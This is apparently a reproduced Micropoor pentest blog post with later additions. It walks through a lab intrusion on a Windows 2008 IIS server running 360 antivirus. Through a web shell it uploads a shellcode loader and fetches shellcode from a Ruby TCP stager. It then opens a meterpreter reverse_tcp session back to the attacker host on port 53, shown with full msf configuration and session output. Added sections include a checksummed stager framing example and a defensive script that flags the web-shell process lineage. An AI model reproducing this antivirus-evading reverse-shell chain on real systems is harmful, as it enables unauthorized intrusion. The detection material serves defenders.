Target machine: mscorsvw

mscorsvw    Posted: 2021-05-23
Focused on APT attack and defense: https://micropoor.blogspot.com/

Attacker: 192.168.1.4 (Debian)
Target: 192.168.1.2 (Windows 2008)
Installed on the target: 360 Safeguard (360卫士) + 360 Antivirus (360杀毒)

The foothold is a web shell in C:\inetpub\wwwroot running as the IIS application pool identity (getuid confirms this further down); every command below is issued through it.

[*] Disk list [C: D: E:]

C:\inetpub\wwwroot\>tasklist

Image Name                 PID  Session Name  Session#  Mem Usage
System Idle Process          0                       0       24 K
System                       4                       0      372 K
smss.exe                   236                       0      956 K
csrss.exe                  324                       0    5,572 K
csrss.exe                  364                       1   14,452 K
wininit.exe                372                       0    4,508 K
winlogon.exe               408                       1    5,364 K
services.exe               468                       0    7,376 K
lsass.exe                  476                       0    9,896 K
lsm.exe                    484                       0    3,876 K
svchost.exe                576                       0    8,684 K
vmacthlp.exe               632                       0    3,784 K
svchost.exe                676                       0    7,384 K
svchost.exe                764                       0   12,716 K
svchost.exe                800                       0   29,792 K
svchost.exe                848                       0   11,248 K
svchost.exe                900                       0    9,308 K
svchost.exe                940                       0   16,184 K
svchost.exe                332                       0   11,800 K
spoolsv.exe                548                       0   15,568 K
svchost.exe               1052                       0    8,228 K
svchost.exe               1076                       0    8,808 K
svchost.exe               1144                       0    2,576 K
VGAuthService.exe         1216                       0   10,360 K
vmtoolsd.exe              1300                       0   18,068 K
ManagementAgentHost.exe   1332                       0    8,844 K
svchost.exe               1368                       0   11,884 K
WmiPrvSE.exe              1768                       0   13,016 K
dllhost.exe               1848                       0   11,224 K
msdtc.exe                 1940                       0    7,736 K
WmiPrvSE.exe              1440                       0   19,768 K
mscorsvw.exe               296                       0    4,732 K
mscorsvw.exe               584                       0    5,088 K
sppsvc.exe                1476                       0    8,408 K
taskhost.exe              2612                       1    6,344 K
dwm.exe                   2868                       1    4,604 K
explorer.exe              2896                       1   44,912 K
vmtoolsd.exe              3008                       1   17,744 K
TrustedInstaller.exe      2268                       0   15,776 K
360Tray.exe               2684                       1    6,056 K
360sd.exe                 2636                       1    1,316 K
ZhuDongFangYu.exe         2456                       0   14,292 K
360rp.exe                 1712                       1   27,072 K
SoftMgrLite.exe            864                       1   16,816 K
w3wp.exe                  3300                       0   42,836 K
svchost.exe               3840                       0    4,584 K
notepad.exe               3712                       1    5,772 K
cmd.exe                   3384                       0    2,376 K
conhost.exe               3520                       0    3,420 K
tasklist.exe              3096                       0    5,276 K

The 360 components are all up: 360Tray.exe, 360sd.exe, 360rp.exe and ZhuDongFangYu.exe (360's active defense, "主动防御"). The web shell's own cmd.exe/conhost.exe pair (3384/3520) is visible too, as is the tasklist.exe it just spawned.

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is C6F8-9BAB

 Directory of C:\

2017/12/13  03:28    <DIR>          inetpub
2009/07/14  11:20    <DIR>          PerfLogs
2017/12/13  03:28    <DIR>          Program Files
2019/01/23  14:09    <DIR>          Program Files (x86)
2019/01/23  14:15    <DIR>          Users
2017/12/13  03:25    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  21,387,132,928 bytes free

The target is 64-bit Windows 2008:

C:\>ver

Microsoft Windows [Version 6.1.7600]

Build 6.1.7600 is Windows Server 2008 R2 RTM, which sysinfo confirms later on.

Configure the payload:

Micropoor_rev.rb is a minimal TCP stager. For every connection it logs the peer, writes the stage bytes and hangs up; the loader uploaded in the next step connects to it on port 8080 to fetch those bytes and run them. The stage itself is elided from this copy of the post.

root@John:/var/www/html# cat ./Micropoor_rev.rb
require 'socket'

if ARGV.empty?
  puts "Usage:"
  puts "Micropoor.rb port"
  exit
end

PORT = ARGV.first.to_i

# One connection, one delivery: log the peer, write the stage, close.
def handle_connection(client)
  puts "Payload is on-line #{client}"

  client.write("...")   # stage bytes elided from this copy of the post
  client.close
end

socket = TCPServer.new('0.0.0.0', PORT)
puts "Listening on #{PORT}."

while client = socket.accept
  # Hand the socket to the thread as an argument; capturing the loop variable
  # would race with the next accept reassigning it.
  Thread.new(client) { |c| handle_connection(c) }
end

root@John:/var/www/html# ruby ./Micropoor_rev.rb 8080
Listening on 8080.
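The stager above writes raw bytes and relies on the loader reading to EOF, so a truncated or modified stage would be executed blind. The following is an added example, not Micropoor's server or loader: the same one-thread-per-connection shape, but with a length-prefixed, SHA-256-checked frame and a client that reads exactly the advertised number of bytes and refuses anything that does not verify. The frame marker "MSTG", the 1 MiB size cap and the frame layout are assumptions of this example, and the sample stage is a constructed NOP-sled placeholder, not a working payload.

```ruby
require 'socket'
require 'stringio'
require 'digest'

# Hypothetical frame layout (assumption): MAGIC | uint32 BE length | SHA-256(stage) | stage
MAGIC     = 'MSTG'.b
MAX_STAGE = 1 << 20   # 1 MiB cap (assumption): a hostile peer cannot make the loader allocate unbounded memory

def frame_stage(stage)
  stage = stage.b
  MAGIC + [stage.bytesize].pack('N') + Digest::SHA256.digest(stage) + stage
end

# read(n) on a socket may return fewer than n bytes; loop until we have them all or fail loudly.
def read_exact(io, n)
  buf = ''.b
  while buf.bytesize < n
    chunk = io.read(n - buf.bytesize)
    raise IOError, "short read: got #{buf.bytesize} of #{n} bytes" if chunk.nil? || chunk.empty?
    buf << chunk.b
  end
  buf
end

# Client-side check: a bad marker, an oversized length, a short read or a digest
# mismatch all raise instead of handing a damaged blob to whatever executes it.
def parse_frame(io)
  raise IOError, 'bad frame marker' unless read_exact(io, 4) == MAGIC
  len = read_exact(io, 4).unpack1('N')
  raise IOError, "stage too large: #{len} bytes" if len > MAX_STAGE
  expected = read_exact(io, 32)
  stage = read_exact(io, len)
  raise IOError, 'stage digest mismatch' unless Digest::SHA256.digest(stage) == expected
  stage
end

# Server side, same shape as Micropoor_rev.rb: one thread per connection, write, close.
# port 0 lets the kernel pick a free port (used by the demo below).
def serve_stage(stage, port: 0)
  server = TCPServer.new('127.0.0.1', port)
  frame  = frame_stage(stage)
  thread = Thread.new do
    begin
      loop do
        client = server.accept
        Thread.new(client) { |c| c.write(frame); c.close }  # pass the socket in, do not capture the loop variable
      end
    rescue IOError, Errno::EBADF
      # listener closed: stop serving
    end
  end
  [server, thread]
end

# Loader side: connect, parse one frame, return the verified stage bytes.
def fetch_stage(host, port)
  TCPSocket.open(host, port) { |sock| parse_frame(sock) }
end

# Constructed placeholder stage (a NOP sled and a ret), not a working payload.
SAMPLE_STAGE = ([0x90] * 16 + [0xC3]).pack('C*')

# Full exchange over loopback: start the listener, fetch once, tear down.
def roundtrip_over_tcp(stage)
  server, thread = serve_stage(stage)
  fetch_stage('127.0.0.1', server.addr[1])
ensure
  server.close if server
  thread.join(1) if thread
end

if __FILE__ == $0
  begin
    got = roundtrip_over_tcp(SAMPLE_STAGE)
    puts "fetched #{got.bytesize} bytes over TCP, intact: #{got == SAMPLE_STAGE}"
  rescue SystemCallError, SocketError => e
    puts "TCP demo skipped: #{e.message}"
  end
end
```

The digest only guards against corruption and casual tampering in transit; it is not authentication, since anyone who can reach the listener can also read the frame format. A listener like this should be bound to the interface that actually needs it and taken down as soon as the loader has called back.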
Upload Micropoor_shellcode_x64.exe.

Configure msf:

LPORT 53 is only a port choice: the transport is still plain reverse TCP, not DNS, so egress filtering by port number alone does not stop it.

msf exploit(multi/handler) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.4      yes       The listen address (an interface may be specified)
   LPORT     53               yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.4:53

Run on the target:

The loader fetches its shellcode from the Ruby listener on 8080 and executes it; that shellcode calls back to the handler on 53, which then sends the full meterpreter stage (the "Sending stage" line). The loader binary itself is not shown here; see the appendix link.

msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.4:53
[*] Sending stage (206403 bytes) to 192.168.1.2
[*] Meterpreter session 6 opened (192.168.1.4:53 -> 192.168.1.2:49744) at 2019-01-23 01:29:00 -0500

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > sysinfo
Computer        : WIN-5BMI9HGC42S
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:bc:0d:5c
MTU          : 1500
IPv4 Address : 192.168.1.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::5582:70c8:a5a8:8223
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > ps

Process List
============

 PID   PPID  Name                         Arch  Session  User                        Path
 ---   ----  ----                         ----  -------  ----                        ----
 0     0     [System Process]
 4     0     System
 236   4     smss.exe
 296   468   mscorsvw.exe
 324   316   csrss.exe
 332   468   svchost.exe
 364   356   csrss.exe
 372   316   wininit.exe
 408   356   winlogon.exe
 468   372   services.exe
 476   372   lsass.exe
 484   372   lsm.exe
 548   468   spoolsv.exe
 576   468   svchost.exe
 584   468   mscorsvw.exe
 632   468   vmacthlp.exe
 676   468   svchost.exe
 764   468   svchost.exe
 800   468   svchost.exe
 848   468   svchost.exe
 864   2684  SoftMgrLite.exe
 900   468   svchost.exe
 940   468   svchost.exe
 1052  468   svchost.exe
 1076  468   svchost.exe
 1144  468   svchost.exe
 1216  468   VGAuthService.exe
 1300  468   vmtoolsd.exe
 1332  468   ManagementAgentHost.exe
 1368  468   svchost.exe
 1440  576   WmiPrvSE.exe
 1476  468   sppsvc.exe
 1712  2636  360rp.exe
 1768  576   WmiPrvSE.exe
 1848  468   dllhost.exe
 1940  468   msdtc.exe
 2456  468   ZhuDongFangYu.exe
 2612  468   taskhost.exe
 2636  1096  360sd.exe
 2684  1096  360Tray.exe
 2788  3408  Micropoor_shellcode_x64.exe  x64   0        IIS APPPOOL\DefaultAppPool  C:\inetpub\wwwroot\Micropoor_shellcode_x64.exe
 2868  900   dwm.exe
 2896  2852  explorer.exe
 3008  2896  vmtoolsd.exe
 3196  468   svchost.exe
 3300  1368  w3wp.exe                     x64   0        IIS APPPOOL\DefaultAppPool  c:\windows\system32\inetsrv\w3wp.exe
 3408  3300  cmd.exe                      x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\cmd.exe
 3712  2896  notepad.exe
 4092  324   conhost.exe                  x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\conhost.exe

meterpreter >

Two things stand out in the process list. First, the lineage is w3wp.exe (3300) -> cmd.exe (3408) -> Micropoor_shellcode_x64.exe (2788), all running as IIS APPPOOL\DefaultAppPool and the loader executing straight out of C:\inetpub\wwwroot; an IIS worker spawning a shell that launches a binary from the web root is about as loud a web-shell signature as a host produces. Second, 360Tray.exe, 360sd.exe, 360rp.exe and ZhuDongFangYu.exe are all still running alongside it, so the 360 Safeguard + 360 Antivirus pair let the loader fetch and execute its shellcode without intervening. Arch, session, user and path are only filled in for the four processes the app pool token is allowed to open; the rest of the table is limited to what the session can see.

Target machine: [screenshot]

Appendix: Micropoor_shellcode for payload backdoor, https://micropoor.blogspot.com/2019/01/micropoorshellcode-for-payload-backdoor.html

Micropoor
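The process list above is also the defender's evidence. As an added example that is not part of the original post, here is the hunt a responder would run over that table: parse the meterpreter `ps` rows, rebuild the parent chain from the PPID column, and flag any process that descends from w3wp.exe (a shell or otherwise) plus anything executing from under \inetpub\wwwroot\. The rows are copied from the listing above, trimmed to the ones that matter; the parser assumes columns are separated by at least two spaces, as in that listing, and the w3wp.exe, shell and web-root patterns are this example's choices.

```ruby
ProcEntry = Struct.new(:pid, :ppid, :name, :arch, :session, :user, :path)

# Rows copied from the meterpreter ps listing above (trimmed); a constructed
# sample for this example, kept in the listing's own two-space column layout.
PS_SAMPLE = <<~'PS'
   PID   PPID  Name                         Arch  Session  User                        Path
   ---   ----  ----                         ----  -------  ----                        ----
   0     0     [System Process]
   4     0     System
   324   316   csrss.exe
   468   372   services.exe
   1368  468   svchost.exe
   2684  1096  360Tray.exe
   2788  3408  Micropoor_shellcode_x64.exe  x64   0        IIS APPPOOL\DefaultAppPool  C:\inetpub\wwwroot\Micropoor_shellcode_x64.exe
   3300  1368  w3wp.exe                     x64   0        IIS APPPOOL\DefaultAppPool  c:\windows\system32\inetsrv\w3wp.exe
   3408  3300  cmd.exe                      x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\cmd.exe
   4092  324   conhost.exe                  x64   0        IIS APPPOOL\DefaultAppPool  C:\Windows\system32\conhost.exe
PS

# pid, ppid, name, then optionally arch/session/user/path (only present for
# processes the session's token could open). Names and users may contain a
# single space; columns are separated by two or more.
ROW = /\A\s*(?<pid>\d+)\s+(?<ppid>\d+)\s+(?<name>\S+(?: \S+)*?)(?:\s{2,}(?<arch>x64|x86)\s+(?<session>\d+)\s+(?<user>\S+(?: \S+)*?)\s{2,}(?<path>\S.*?))?\s*\z/

WEB_SERVER = /\Aw3wp\.exe\z/i                              # IIS worker process (assumption: the only web server of interest)
SHELL      = /\A(?:cmd|powershell|wscript|cscript)\.exe\z/i # interpreters a worker should never spawn (example's list)
WEB_ROOT   = /\\inetpub\\wwwroot\\/i                        # content directory; binaries here are writable-by-upload

def parse_ps(text)
  procs = {}
  text.each_line do |line|
    m = ROW.match(line) or next   # header and separator rows do not match
    e = ProcEntry.new(m[:pid].to_i, m[:ppid].to_i, m[:name], m[:arch],
                      m[:session] && m[:session].to_i, m[:user], m[:path])
    procs[e.pid] = e
  end
  procs
end

# Walk PPID links upward; stop at a missing parent, a self-parent or a cycle
# (PIDs get reused, so a PPID can point at an unrelated newer process).
def ancestors(procs, pid)
  chain, seen = [], { pid => true }
  cur = procs[pid]
  while cur && (parent = procs[cur.ppid]) && !seen[parent.pid]
    seen[parent.pid] = true
    chain << parent
    cur = parent
  end
  chain
end

def find_suspicious(procs)
  findings = []
  procs.each_value do |p|
    chain = ancestors(procs, p.pid)
    if chain.any? { |a| a.name =~ WEB_SERVER }
      reason = p.name =~ SHELL ? :shell_under_web_server : :descendant_of_web_server
      findings << { pid: p.pid, name: p.name, reason: reason,
                    lineage: ([p] + chain).map { |x| "#{x.name}(#{x.pid})" }.join(' <- ') }
    end
    if p.path && p.path =~ WEB_ROOT
      findings << { pid: p.pid, name: p.name, reason: :binary_in_web_root, lineage: p.path }
    end
  end
  findings.sort_by { |f| [f[:pid], f[:reason].to_s] }
end

if __FILE__ == $0
  find_suspicious(parse_ps(PS_SAMPLE)).each do |f|
    puts format('%-5d %-28s %-26s %s', f[:pid], f[:name], f[:reason], f[:lineage])
  end
end
```

On the sample this yields three findings: cmd.exe (3408) as a shell under w3wp.exe, and Micropoor_shellcode_x64.exe (2788) twice, once as a descendant of the worker and once for running out of the web root. conhost.exe (4092) is not flagged even though it runs as the app pool identity, because its parent is csrss.exe; on a real host the same logic should be fed a full process snapshot (tasklist /v, Sysmon event 1, or EDR telemetry) rather than a table truncated by what one token can see.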
